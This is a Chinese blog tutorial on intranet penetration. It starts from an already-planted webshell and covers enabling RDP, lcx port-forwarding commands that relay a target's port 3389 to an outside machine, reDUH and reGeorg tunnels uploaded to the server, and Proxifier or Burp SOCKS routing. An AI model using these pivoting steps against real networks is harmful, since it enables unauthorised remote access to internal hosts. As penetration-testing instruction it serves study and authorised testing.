内网渗透之——浅析内网渗透

浅析内网渗透

关于内网渗透其实方法和思路以及要注意的点内容非常多,又是一个大坑,我就暂且先从三个情况下分别整理一种方法,大概了解一下,先挖个坑哈,手里还有资料但太乱了,之后我再整理吧(真的很多,不是我偷懒,看的眼都晕了,感觉就是一套全新的渗透测试那么多)
在这里插入图片描述

前瞻

先回看一下之前的几个小思路吧

Webshell如何开启3389服务

1、通过修改注册表开启远程终端,详情请看: http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html
2、通过3389工具开启远程终端
3、数据库可以开
4、上传exe可以开

服务器端口被修改如何查找

注册表读取、
端口扫描、
命令探针查找修改后的端口

外到内渗透连接

拿到webshell,服务器处于内网(没有公网地址)的情况下如何远程连接

1、通过lcx工具解决内网远程连接

把lcx传到远程服务器去
原理就是把目标机端口转发到自己公网IP的端口
Webshell上执行:lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389
将本机3389端口流量转发到公网ip的2222端口上去
自己的电脑里面执行:lcx.exe -listen 2222 4444
监听本地的2222端口将流量转发到4444
然后连接127.0.0.1 4444

缺陷

可能在公司里实际渗透测试过程中,你是在内网中的,同时你无法操控路由器,没有公网地址
解决就通过下面讲的服务器处于内网远程连接

内到内渗透连接

两台电脑分别在各自的内网怎么连接

通过端口转发脚本解决内网远程连接
通过reDUH
选择对应语言的文件上传
访问一下
通过设置,将本地3389映射到1234上
访问127.0.0.1 1234

内网渗透测试

在上面我们讲到的都是单端口转发,那么如何扩大战果,得到与目标机同一公网下的其他主机的权限呢

环境准备

两台虚拟机
两个网卡
一个处于lan区段1
另一个nat模式映射到公网

方法:需要两个工具结合

reGeorg

把tunnel.php传到服务器
本地执行cmd

reGeorg-master\reGeorgSocksProxy.py -p  9999 -u http://192.168.0.102:8080/tunnel.nosocket.php

让内网之间构成一个通道

Proxifier

代理工具装在本机
设置地址127.0.0.1端口跟上面对应
协议选择

socks协议
各种协议都支持
https协议
web

配置代理规则

本地所有数据包都走socks
通过它转发本地所有流量

补充

关于burp+Proxifier结合抓包

有很多APP现在是防代理的或者黑名单防御,比如微信
但是抓包中间加一个环节使用这个软件 就可以应对了
因为socks是很正规的

方法
在电脑上装模拟器
把burp ca证书丢在模拟器里加载
设置规则 新建规则 让模拟器这个进程所有数据包走socks就可以了
注意 结合使用的工具不要进行拦截 要选择direct模式
访问验证

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章